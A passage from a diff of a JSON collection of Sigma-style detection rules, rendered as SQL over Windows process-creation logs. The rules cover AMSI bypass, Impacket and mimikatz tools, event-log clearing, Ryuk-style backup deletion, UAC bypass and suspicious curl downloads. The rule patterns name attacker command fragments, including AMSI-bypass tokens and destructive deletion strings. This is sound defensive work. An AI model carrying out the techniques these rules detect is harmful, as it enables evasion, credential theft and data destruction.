'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\' OR 
CommandLine LIKE '%cmd.exe /c btool server list general --no-log' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\system32\\\\reg.exe query hklm\\\\software\\\\microsoft\\\\windows\\\\softwareinventorylogging /v collectionstate /reg:64%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /c PAUSE' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ping_hex_ip.yml" + "filename": "proc_creation_win_susp_elevated_system_shell.yml" }, { - "title": "Potential ACTINIUM Persistence Activity", - "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", - "status": "test", - "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", + "id": "b66474aa-bd92-4333-a16c-298155b120df", + "status": "experimental", + "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. 
This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", + "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_actinium_persistence.yml" + "filename": "proc_creation_win_schtasks_powershell_persistence.yml" }, { - "title": "Suspicious Eventlog Clear or Configuration Change", - "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "status": "stable", - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. 
Might be used by ransomwares during the attack (seen by NotPetya and others).", - "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", + "title": "Disable Important Scheduled Task", + "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "attack.t1562.002", - "car.2016-04-002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Maintenance activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND 
CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_eventlog_clear.yml" + "filename": "proc_creation_win_schtasks_disable.yml" }, { - "title": "Potential AMSI Bypass Via .NET Reflection", - "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "title": "Explorer NOUACCHECK Flag", + "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", "status": "test", - "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", - "author": "Markus Neis, @Kostastsale", + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 
'%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" + "filename": "proc_creation_win_explorer_nouaccheck.yml" }, { - "title": "HackTool - Impacket Tools Execution", - "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", - "status": "test", - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Defense Evasion Via Right-to-Left Override", + "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "status": "experimental", + "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", + "author": "Micah Babinski, @micahbabinski", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion", + "attack.t1036.002" ], "falsepositives": [ - "Legitimate use of the impacket tools" + "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\goldenPac%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\kintercept%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rpcdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\samrdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\secretsdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbexec%' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmiexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%‮%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impacket_tools.yml" + "filename": "proc_creation_win_susp_right_to_left_override.yml" }, { - "title": "Interactive AT Job", - "id": 
"60fc936d-2eb0-4543-8a13-911c750a1dfc", - "status": "test", - "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Ryuk Ransomware Activity", + "id": "c37510b8-2107-4b78-aa32-72f251e7a844", + "status": "stable", + "description": "Detects Ryuk ransomware activity", + "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely (at.exe deprecated as of Windows 8)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_at_interactive_execution.yml" + "filename": "proc_creation_win_malware_ryuk.yml" }, { - "title": "HackTool - Pypykatz Credentials Dumping Activity", - "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", - "status": "test", - 
"description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", - "author": "frack113", + "title": "Set Suspicious Files as System Files Using Attrib.EXE", + "id": "efec536f-72e8-4656-8960-5e85d091345b", + "status": "experimental", + "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' 
ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_pypykatz.yml" + "filename": "proc_creation_win_attrib_system_susp_paths.yml" }, { - "title": "Root Certificate Installed From Susp Locations", - "id": "5f6a601c-2ecb-498b-9c33-660362323afa", - "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Bloodhound/Sharphound Execution", + "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "status": "test", + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Other programs that use these command line option and accepts an 'All' parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Product LIKE '%SharpHound%' 
ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" + "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" }, { - "title": "Suspicious WERMGR Process Patterns", - "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", - "status": "experimental", - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass Abusing Winsat Path Parsing - Process", + "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wermgr_susp_child_process.yml" + "filename": "proc_creation_win_uac_bypass_winsat.yml" }, { - "title": "Suspicious Curl.EXE Download", - "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "title": "Suspicious Mstsc.EXE Execution With Local RDP File", + "id": "6e22722b-dfb1-4508-a911-49ac840b40f8", "status": "experimental", - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likelihood is related to how often the paths are used in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\') AND (CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\Tasks\\_Migrated %' ESCAPE '\\' OR CommandLine LIKE 
'%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tracing\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_susp_download.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" }, { - "title": "Disabled IE Security Features", - "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", - "status": "test", - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - SharpChisel Execution", + "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "status": "experimental", + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" ], - "filename": "proc_creation_win_powershell_disable_ie_features.yml" + "filename": "proc_creation_win_hktl_sharp_chisel.yml" }, { - "title": "MERCURY APT Activity", - "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", - "status": 
